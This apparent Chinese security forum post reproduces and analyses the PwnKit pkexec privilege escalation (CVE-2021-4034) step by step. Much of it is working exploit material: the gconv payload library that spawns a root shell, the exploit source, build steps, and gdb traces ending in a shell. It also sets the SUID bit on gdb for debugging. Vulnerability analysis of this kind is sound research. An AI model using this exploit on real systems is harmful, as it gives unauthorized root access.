|
本帖最后由 Grav1ty 于 2022-9-30 18:01 编辑
CVE-2021-4034 pkexec本地提权漏洞复现与原理分析
前言
近期爆出了一个影响甚广的本地提权漏洞CVE-2021-4034,诸如Ubuntu、Debian、Fedora和CentOS 等主流Linux操作系统都受到了该漏洞影响。漏洞利用脚本在互联网上已经公开,利用起来异常简单且稳定。
在当前的环境下,当攻击者获得目标操作系统一个普通用户权限时,则极大概率可以直接获得root权限,使得权限控制机制形同虚设。
而如此重大的漏洞,起因却仅仅是因为一个名为pkexec的程序对参数个数的判断存在疏忽,造成了一个数组溢出。
如何利用一个数组溢出获得root权限呢?怀着这一疑问,本人对公开利用脚本进行了源码调试分析,感慨其利用技巧极具艺术性的同时,将分析过程记录成本篇文章。
二
感性的认识——漏洞复现
本次的漏洞复现环境为Kali-Linux-2021.2-vmware-amd64,其pkexec版本为0.105,使用普通用户kali进行复现。 下载exp源码并编译(如果目标环境没有gcc,可以在本地编译好了之后再拷贝上去)。
git clone https://github.com/berdav/CVE-2021-4034.gitcd CVE-2021-4034make
测试exp效果,得到了root权限。
./cve-2021-4034
三
漏洞分析基础环境
操作系统:Kali-Linux-2021.2-vmware-amd64
polkit源码版本:polkit-0.105
gdb配置:
① 设置反汇编风格为intel风格(个人喜好)
② 关闭pwndbg等配置,避免调试时过多的信息造成干扰
③ 设置gdb的SUID位,避免调试pkexec时执行到geteuid函数失败,报错“pkexec must be setuid root”
chmod 4755 /usr/bin/gdb 资源下载
https://src.fedoraproject.org/repo/pkgs/polkit/polkit-0.105.tar.gz/md5/9c29e1b6c214f0bd6f1d4ee303dfaed9/polkit-0.105.tar.gz
https://github.com/berdav/CVE-2021-4034.git
四
前置知识 argc何时为0
test.c
- #include<stdio.h>int main(int argc, char** argv){ printf("argc: %d\n", argc); for(int i; i<argc; i++) { printf("%s\n", argv<i>); } return 0;}</i>
复制代码
学过C语言的朋友都知道,如上代码中,argc表示参数的个数,argv存放着具体的参数,argv[0]指向程序本身,argv[1]指向第一个参数,argv[2]指向第二个参数,...,argv[argc]存放0 表示结束。
当我们在命令行中执行程序时,argc的取值至少为1,因为即使不加参数,argv[0]也要指向程序路径本身。pkexec的作者也是这么想的,从而百密一疏,遗留下了一个重大隐患。在特殊情况下,如使用execve来调用程序,并给argv传值 NULL,则argc为0。
execve函数声明
- <font color="rgb(63, 63, 63)"><font style="font-size: 15px">
- </font></font>#include <unistd.h>int execve(const char *pathname, char *const argv[], char *const envp[]);
复制代码
execve.c
#include <unistd.h> int main(int argc, char **argv){ return execve("./test", NULL, NULL);}argv与envp在内存里的布局是连续的
execve.c#include <unistd.h> int main(){ char* const argv[] = { "AAAA1111", "BBBB2222", "CCCC3333", NULL }; char* const envp[] = { "DDDD3333", "EEEE4444", "FFFF5555", NULL }; return execve("./test", argv, envp);}
使用execve调用test程序,并分别给argv与envp传递了3个值。 test.c#include<stdio.h>int main(int argc, char** argv){ printf("argc: %d\n", argc); for(int i; i<8; i++) { if(argv!=NULL) { printf("argv[%d]: %s\n", i, argv); } else { printf("argv[%d]: NULL\n", i); } } return 0;}
argc为3,加上截止符0,argv的大小为4,这里直接打印了8个值,显然是越界了。argv后面的内容是什么呢?
通过实验,表明argv与envp在内存布局上是连续的,envp紧跟argv之后。利用g_printerr 执行命令
main.cint main(){ g_printerr("Hello world.\n"); return 0;}
pwnkit.c#include <stdio.h>#include <stdlib.h>#include <unistd.h> void gconv(void) {} void gconv_init(void *step){ char * const args[] = { "/bin/sh", "-pi", NULL }; char * const environ[] = { "PATH=/bin:/usr/bin", NULL }; execve(args[0], args, environ); exit(0);}
Makefileall: echo "module UTF-8// AAAA// pwnkit 1" > gconv-modules gcc --shared -fPIC -o pwnkit.so pwnkit.c gcc -o test main.c -lglib-2.0
run.sh#!/bin/bash
export CHARSET=AAAAexport GCONV_PATH=. ./test
g_printerr 的功能和printf很像,主要就是打印文本。在本实验中,当环境变量设置了CHARSET,且不为UTF-8时,g_printerr会进行编码转换,而转换的方法就是根据GCONV_PATH里的配置文件gconv-modules的说明,调用pwnkit.so,从而得到shell。
SUID权限
当一个程序被设置了SUID权限,则其他用户执行该程序时,可以临时切换到程序所有者的权限去执行一些功能。因为涉及到权限变更,所以在执行操作系统自带的此类程序时,往往被要求授权。
pkexec的所有者为root,具有SUID权限,当普通用户kali执行“pkexec bash”命令时会被要求授权。获得授权后,得到了root权限。
执行具有SUID权限的程序时,不安全的环境变量不会被引入
打印所有环境变量
main.cint main(){ system("env"); return 0;}
使用root用户进行编译,并设置SUID权限gcc -g -O0 -o test main.cchmod 4755 ./test
设置环境变量,并通过test程序打印出来,用以判断环境变量的导入情况。 run.sh#!/bin/bash
export GCONV_PATH=AAAA0001export GETCONF_DIR=AAAA0002export HOSTALIASES=AAAA0003export LD_AUDIT=AAAA0004export LD_DEBUG=AAAA0005export LD_DEBUG_OUTPUT=AAAA0006export LD_DYNAMIC_WEAK=AAAA0007export LD_HWCAP_MASK=AAAA0008export LD_LIBRARY_PATH=AAAA0009export LD_ORIGIN_PATH=AAAA0010export LD_PRELOAD=AAAA0011export LD_PROFILE=AAAA0012export LD_SHOW_AUXV=AAAA0013export LD_USE_LOAD_BIAS=AAAA0014export LOCALDOMAIN=AAAA0015export LOCPATH=AAAA0016export MALLOC_TRACE=AAAA0017export NIS_PATH=AAAA0018export NLSPATH=AAAA0019export RESOLV_HOST_CONF=AAAA0020export RES_OPTIONS=AAAA0021export TMPDIR=AAAA0022export TZDIR=AAAA0023 export PATH=AAAA1001:/usr/binexport SHELL=AAAA1002export CHARSET=AAAA1003export BBBB=AAAA1004 ./test
分别以root用户和kali用户执行“./run.sh |grep AAAA”,用来判断环境变量的导入情况。
通过实验可以知道,当以kali用户身份去执行所有者为root且具有SUID权限的程序时,GCONV_PATH、LD_PRELOAD 等不安全的环境变量并不会被引入。
五
利用原理分析
构建pkexec源码调试环境
下载源码polkit-0.105https://src.fedoraproject.org/repo/pkgs/polkit/polkit-0.105.tar.gz/md5/9c29e1b6c214f0bd6f1d4ee303dfaed9/polkit-0.105.tar.gz安装编译环境apt install automakeapt install autopointapt install libtoolapt install gtk-doc-toolsapt install libpam0g-devapt install intltool编译./configure (要把-O2换成 -O0,关闭优化,方便调试)make设置SUID权限
以root用户赋权cd src/programs/.libschmod 4755 pkexec修改利用脚本berdav/CVE-2021-4034
修改利用脚本里调用的程序为刚编译好的pkexec,以便源码调试。
cve-2021-4034.c#include <unistd.h> int main(int argc, char **argv){ char * const args[] = { NULL }; char * const environ[] = { "pwnkit.so:.", "PATH=GCONV_PATH=.", "SHELL=/lol/i/do/not/exists", "CHARSET=PWNKIT", "GIO_USE_VFS=", NULL }; return execve("../polkit-0.105/src/programs/.libs/pkexec", args, environ);}gdb调试pkexec的授权认证是如何被绕过的
"./pkexec bash"是正常的用法,会先请求授权,然后再以root权限执行bash命令;而"./cve-2021-4034"会利用漏洞,跳过授权认证,直接以root权限执行命令。授权认证是如何被绕过的呢?
如果能在源码层次记录下两个程序的执行流程,则可以比对出有差异的地方,从而帮助我们理解“授权认证是如何被绕过”这个问题,更直观的理解漏洞利用过程。
gdb源码追踪脚本
step_trace.pyimport sysimport gdbimport osimport re def in_frames(needle): """ Check if the passed frame is still on the current stack """ hay = gdb.newest_frame() while hay: if hay == needle: return True hay = hay.older() return False # Use this to reduce any kind of unwanted noisedef filter_step(output): output = re.sub(r'^.*No such file or directory\.\n', r'', output, flags=re.M) output = re.sub(r'^\d+\s+in\s+.*\n', r'', output, flags=re.M) return output def step_trace(filename=None, step="step"): counter = 0 if filename: output = "" frame = gdb.newest_frame() print("Stepping until end of {} @ {}:{}".format(frame.name(), frame.function().symtab, frame.function().line)) while in_frames(frame): counter += 1 if filename: output += filter_step(gdb.execute(step, to_string=True)) else: gdb.execute(step) if filename: with open(filename, "w") as file: file.write(output) print("Done stepping through {} lines.".format(counter))(gdb) source step_trace.py(gdb) python step_trace(step="next")
step_trace.py是gdb的源码追踪脚本,可以把执行过的代码打印到终端上。其中,step="next" 表示单步步过,step="step" 表示单步步入。
调试"./pkexec bash"
bplistset follow-fork-mode parentb mainb /home/kali/software/relase/polkit-0.105/src/programs/pkexec.c:900r bashsource step_trace.pypython step_trace(step="next")
在pkexec的main函数和调用execv(pkexec.c:900)时下断点,记录中间的源码调用。在调试过程中,可以知道授权弹窗在705行代码polkit_authority_check_authorization_sync处调用。另外,step_trace.py 把源码追踪的结果打印在了终端,可以通过复制的方式另存为gdb_pkexec_bash.log,以便后面的分析。
调试"./cve-2021-4034"
bplist_cveb mainrcb /home/kali/software/release/polkit-0.105/src/programs/pkexec.c:900set follow-fork-mode parentsource /home/kali/software/release/polkit-0.105/src/programs/.libs/step_trace.pypython step_trace(step="next")
源码追踪"./cve-2021-4034"的执行,并把日志记录为gdb_cve-2021-4034.log,以便后面的分析。
代码流日志比对
通过比对代码流日志,可以清晰的看到"./cve-2021-4034"对argc的处理和validate_environment_variable的行为上存在异常,发现这两点异常将十分有助于我们理解漏洞利用过程。"./cve-2021-4034"的代码流程非常的短,其在调用环境变量校验函数validate_environment_variable的时候就获得了shell,这也就解释了为何会绕过授权认证,因为根本就没走到那。如何获取shell权限的
通过gdb调试,可以打印一些关键变量的值,并给gdb_cve-2021-4034.log加上备注,这样有助于理解漏洞利用过程。
深入调试"./cve-2021-4034"
bpb mainrcb /home/kali/software/release/polkit-0.105/src/programs/pkexec.c:593set follow-fork-mode parentgdb ./cve-2021-4034 -x bp
由图可知,参数数组与环境变量数组在内存布局上是连续的,本例中,argv[1]即是environ[0]。
s被赋值为"GCONV_PATH=./pwnkit.so:.",在pkexec程序看来,这只是一个普通的文件路径,而这是攻击者特意构造的,是为了引入不安全的环境变量GCONV_PATH。
利用越界写漏洞,成功引入不安全的环境变量GCONV_PATH。
构造报错,调用g_printerr,得到shell。
gdb_cve-2021-4034_details.log
- Breakpoint 1, main (argc=0, argv=0x7ffe2d2d4e58) at pkexec.c:406
- 406 const gchar *environment_variables_to_save[] = {
- Breakpoint 2 at 0x55d64339bed6: file pkexec.c, line 900.
- Stepping until end of main @ pkexec.c:386
- 442 ret = 127;
- 443 authority = NULL;
- 444 subject = NULL;
- 445 details = NULL;
- 446 result = NULL;
- 447 action_id = NULL;
- 448 saved_env = NULL;
- 449 path = NULL;
- 450 command_line = NULL;
- 451 opt_user = NULL;
- 452 local_agent_handle = NULL;
- 455 if (geteuid () != 0)
- 461 original_user_name = g_strdup (g_get_user_name ());
- 462 if (original_user_name == NULL)
- 468 if (getcwd (original_cwd, sizeof (original_cwd)) == NULL)
- 478 opt_show_help = FALSE;
- 479 opt_show_version = FALSE;
- 480 opt_disable_internal_agent = FALSE;
- 481 for (n = 1; n < (guint) argc; n++) //n被赋值为1
- 512 if (opt_show_help)
- 518 else if (opt_show_version)
- 525 if (opt_user == NULL)
- --Type <RET> for more, q to quit, c to continue without paging--
- 526 opt_user = g_strdup ("root");
- 536 g_assert (argv[argc] == NULL);
- 537 path = g_strdup (argv[n]); //越界读,path被赋值为 argv[1],即 environ[0],"pwnkit.so:."
- 538 if (path == NULL)
- 543 if (path[0] != '/')
- 546 s = g_find_program_in_path (path); //在环境变量PATH中寻找"pwnkit.so:.",并把路径返回给 s。利用脚本中把PATH设置为"GCONV_PATH=.",且在磁盘上提前生成了名为"GCONV_PATH=."的文件夹,并放置了名为"pwnkit.so:."的程序,因此,s被赋值 "GCONV_PATH=./pwnkit.so:."。
- 547 if (s == NULL)
- 552 g_free (path);
- 553 argv[n] = path = s; //越界写,argv[1]被设置为"GCONV_PATH=./pwnkit.so:.",即environ[0] 被修改,重新引入了不安全的环境变量GCONV_PATH,至此完成了至关重要的一步。接下来只要随便构造个错误,使其报错时调用到 g_printerr 即可。
- 555 if (access (path, F_OK) != 0)
- 560 command_line = g_strjoinv (" ", argv + n);
- 561 exec_argv = argv + n;
- 566 rc = getpwnam_r (opt_user, &pwstruct, pwbuf, sizeof pwbuf, &pw);
- 567 if (rc == 0 && pw == NULL)
- 572 else if (pw == NULL)
- 579 saved_env = g_ptr_array_new ();
- 580 for (n = 0; environment_variables_to_save[n] != NULL; n++)
- 582 const gchar *key = environment_variables_to_save[n];
- 585 value = g_getenv (key);
- 586 if (value == NULL)
- 593 if (!validate_environment_variable (key, value)) //key="SHELL", value="/lol/i/do/not/exists",在校验环境变量时报错"The value for the SHELL variable was not found the /etc/shells file",进而调用了 g_printerr ,触发漏洞利用,最终执行pwnkit.so里的execve("/bin/sh", args, environ)得到shell。
- process 11852 is executing new program: /usr/bin/dash
- Error in re-setting breakpoint 1: Function "main" not defined.
- Error in re-setting breakpoint 2: No source file named /home/kali/software/release/polkit-0.105/src/programs/pkexec.c.
- #
复制代码
六
总结
当使用普通用户权限执行pkexec时,GCONV_PATH、LD_PRELOAD等不安全的环境变量会被删除,但攻击者可以通过参数数组的越界读写漏洞,重新引入不安全的环境变量,进而构造利用链获取root权限。这一漏洞的起因十分简单,危害却十分严重,值得深思。
- <b><b><font color="rgb(63, 63, 63)"><font style="font-size: 15px">参考:</font></font></b></b><div align="left"><i>https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.tx
- </i></div><div align="left"><i>https://duo.com/decipher/serious-privilege-escalation-flaw-in-linux-component-patched</i></div><div align="left"><i>https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034</i></div><div align="left"><i>https://stackoverflow.com/questions/39602306/tracing-program-function-execution-on-source-line-level</i></div><div align="left"><i>https://www.xiebruce.top/1387.html
- <a href="https://bbs.pediy.com/thread-271345.htm" target="_blank">https://bbs.pediy.com/thread-271345.htm</a></i></div>
复制代码
|
|